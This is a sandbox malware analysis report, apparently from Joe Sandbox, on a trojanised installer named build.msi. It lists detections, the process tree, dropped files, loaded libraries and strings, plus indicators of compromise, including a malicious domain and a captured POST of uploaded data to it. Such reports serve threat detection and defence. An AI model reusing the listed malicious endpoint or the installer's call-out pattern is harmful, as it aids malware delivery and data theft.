Windows Analysis Report
build.msi

Overview

General Information

Sample name: build.msi
Analysis ID: 1648463
MD5: cc9a4fbbbabad106e40b7577f6dbbcc1
SHA1: 4edf9195188e721a7b5f394032ddb987144f918e
SHA256: 0b268732e81427c10afaa9679c60485a5c8a71c839f268b6e0e0d7c57efb3832
Tags: HUN, msi, user-smica83
Infos:

Detection

Score: 72
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Checks for available system drives (often done to infect USB drives)
Contains capabilities to detect virtual machines
Creates files inside the system directory
Deletes files inside the Windows folder
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Yara detected AdvancedInstaller

Classification

[Classification chart. Axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Legend: clean, suspicious, malicious]
  • System is w10x64
  • msiexec.exe (PID: 9184 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\build.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 5624 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 8376 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6E1DB9555CE64326EDD6942FBB93A68E MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • launcher.exe (PID: 564 cmdline: "C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe" MD5: C02DC2CA96FE9841963883C0FE177399)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_AdvancedInstaller | Yara detected AdvancedInstaller | Joe Security |
    Source: Network Connection, Author: frack113, Data: DestinationIp: 104.21.64.101, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8376, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49721
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-03-25T21:01:49.311225+0100 | 2829202 | 1 | A Network Trojan was detected | 192.168.2.5 | 49721 | 104.21.64.101 | 443 | TCP

    AV Detection

    Source: https://shaundoose.com/diagnostics.phpAI_DOWNGRADE4010AI_PRESERVE_INSTALL_TYPEPreserveInstallTypeAI_ Avira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\logd.bat Avira: detection malicious, Label: BAT/Wincir.chwfc
    Source: build.msi Virustotal: Detection: 31%
    Source: build.msi ReversingLabs: Detection: 25%
    Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\LICENSE.electron.txt
    Source: unknown HTTPS traffic detected: 104.21.64.101:443 -> 192.168.2.5:49721 version: TLS 1.2
    Source: C:\Windows\System32\msiexec.exe File opened: z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, c:, a:
    Source: Yara match File source: sslproxydump.pcap, type: PCAP

    Networking

    Source: Network traffic Suricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.5:49721 -> 104.21.64.101:443
    Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic DNS traffic detected: DNS query: shaundoose.com
    Source: unknown HTTP traffic detected:
        POST /diagnostics.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded; charset=utf-8
        User-Agent: AdvancedInstaller
        Host: shaundoose.com
        Content-Length: 53
        Cache-Control: no-cache
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/commit/%s)
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/commit/646d1feddcc80b3b51072c5b27a1446487904175
    Source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/commit/646d1feddcc80b3b51072c5b27a1446487904175)
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/discussions
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/discussions/2316
    Source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/discussionsSumatraPDF
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://myactivity.google.com/
    Source: el.pak.4.dr, bg.pak.4.drString found in binary or memory: https://passwords.google.com
    Source: fr.pak.4.drString found in binary or memory: https://passwords.google.comCompte
    Source: es.pak.4.drString found in binary or memory: https://passwords.google.comcuenta
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
    Source: el.pak.4.dr, es.pak.4.dr, bg.pak.4.dr, fr.pak.4.drString found in binary or memory: https://policies.google.com/
    Source: rufus-4.6p.exe.4.drString found in binary or memory: https://rufus.ie
    Source: rufus-4.6p.exe.4.dr, elevate.exe.4.drString found in binary or memory: https://sectigo.com/CPS0
    Source: build.msi String found in binary or memory: https://shaundoose.com/diagnostics.phpAI_DOWNGRADE4010AI_PRESERVE_INSTALL_TYPEPreserveInstallTypeAI_
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknown HTTPS traffic detected: 104.21.64.101:443 -> 192.168.2.5:49721 version: TLS 1.2
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\605253.msi
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI6389.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI6501.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI6560.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI659F.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI65EE.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI6E8B.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{3A2F5F1E-36B0-4920-A5FF-BCB162944D96}
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI717A.tmp
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\605256.msi
    Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI6389.tmp
    Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.dll 882063948D675EE41B5AE68DB3E84879350EC81CF88D15B9BABF2FA08E332863
    Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.exe E2CA3EC168AE9C0B4115CD4FE220145EA9B2DC4B6FC79D765E91F415B34D00DE
    Source: rufus-4.6p.exe.4.dr Static PE information: Resource name: RT_RCDATA type: DOS executable (COM)
    Source: TPClntloc.dll.4.dr Static PE information: No import functions for PE file found
    Source: TPClntdeu.dll.4.dr Static PE information: No import functions for PE file found
    Source: TPClntjpn.dll.4.dr Static PE information: No import functions for PE file found
    Source: build.msi Binary or memory string: OriginalFilenameAICustAct.dllF vs build.msi
    Source: build.msi Binary or memory string: OriginalFilenameDataUploader.dllF vs build.msi
    Source: build.msi Binary or memory string: OriginalFilenameucrtbase.dllj% vs build.msi
    Source: build.msi Binary or memory string: OriginalFilenamevcruntime140.dllT vs build.msi
    Source: build.msi Binary or memory string: OriginalFilenamemsvcp140.dllT vs build.msi
    Source: build.msi Binary or memory string: OriginalFilenameMicrosoft.Web.WebView2.Core.dll vs build.msi
    Source: build.msi Binary or memory string: OriginalFilenameMicrosoft.UI.Xaml.dllD vs build.msi
    Source: build.msi Binary or memory string: OriginalFilenameembeddeduiproxy.dllF vs build.msi
    Source: rufus-4.6p.exe.4.dr Static PE information: Section: UPX1 ZLIB complexity 0.9995281382631407
    Source: classification engine Classification label: mal72.winMSI@6/117@1/1
    Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\Microsoft\CML723F.tmp
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe Mutant created: NULL
    Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF13CF08A5848E8701.TMP
    Source: C:\Windows\System32\msiexec.exe File read: C:\Users\desktop.ini
    Source: C:\Windows\SysWOW64\msiexec.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\TenantRestrictions\Payload
    Source: build.msi Virustotal: Detection: 31%
    Source: build.msi ReversingLabs: Detection: 25%
    Source: launcher.exe String found in binary or memory: sv:Kunde inte hitta SumatraPDF-installation. ta:PDF . th:
    Source: launcher.exe String found in binary or memory: 64-.\n\n 64- tl:Nag-i-install ka n
    Source: unknown Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\build.msi"
    Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
    Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6E1DB9555CE64326EDD6942FBB93A68E
    Source: C:\Windows\System32\msiexec.exe Process created: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe "C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exe"
    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: linkinfo.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: ntshrui.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: cscapi.dllJump to behavior
    Source: C:\Windows\System32\msiexec.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: dbgcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\launcher.exeWindow found: window name: SysTabControl32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: build.msiStatic file information: File size 65046016 > 1048576
    Source: Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb= source: build.msi
    Source: Binary string: c:\repos\clink\.build\release\~working\.build\vs2019\bin\final\clink_dll_x86.pdb source: clink_dll_x86.dll.4.dr
    Source: Binary string: ucrtbase.pdb source: build.msi
    Source: Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: ffmpeg.dll.4.dr
    Source: Binary string: Microsoft.Web.WebView2.Core.pdbGCTL source: build.msi
    Source: Binary string: d:\build\ob\bora-16964525\cayman_libsigcpp2\libsigcpp2\src\MSVC_Net2015\Win32\Release\sigc-2.0.pdb## source: sigc-2.0.dll.4.dr
    Source: Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb source: build.msi
    Source: Binary string: Unable to get temp pathcopy_dllclink\dll_cache\1.4.6.8b1dec_%08xUnable to create path '%s'\clink_dll_x64.dll.originFailed to create origin file at '%s'Failed to copy DLL to '%s'.pdbUnable to get DLL version for '%s'check_dll_version\Unable to query DLL version info for '%s'DLL version: %08x %08x%s%swait_monitor::on_waited source: clink_dll_x64.dll.4.dr
    Source: Binary string: C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\crashinfo\libmupdf.pdb source: launcher.exe, 00000009.00000002.2597059561.000001D54B1E8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: libmupdf.pdb source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\msvcp140_app.pdb source: build.msi
    Source: Binary string: Bookmark Shortcuts%.2flnkfitwidthfitpage"%s" -page %d -view "%s" -zoom %s -scroll %d,%dfitcontentSelect folder with PDF filesBookmark shortcut to page %s of %s*.xps;*.oxps*.pdf*.ps;*.eps*.djvu*.chm*.cbz;*.cbr;*.cb7;*.cbt*.svgSVG documents*.mobi*.epub*.pdb;*.prc*.fb2;*.fb2z;*.zfb2;*.fb2.zip*.bmp;*.dib;*.gif;*.jpg;*.jpeg;*.jxr;*.png;*.tga;*.tif;*.tiff;*.webp;*.heic;*.avifImagesAll supported documents*.txt;*.log;*.nfo;file_id.diz;read.me;*.tcrVK_DOWN source: launcher.exe, 00000009.00000000.1496555390.00007FF7364CE000.00000002.00000001.01000000.00000004.sdmp
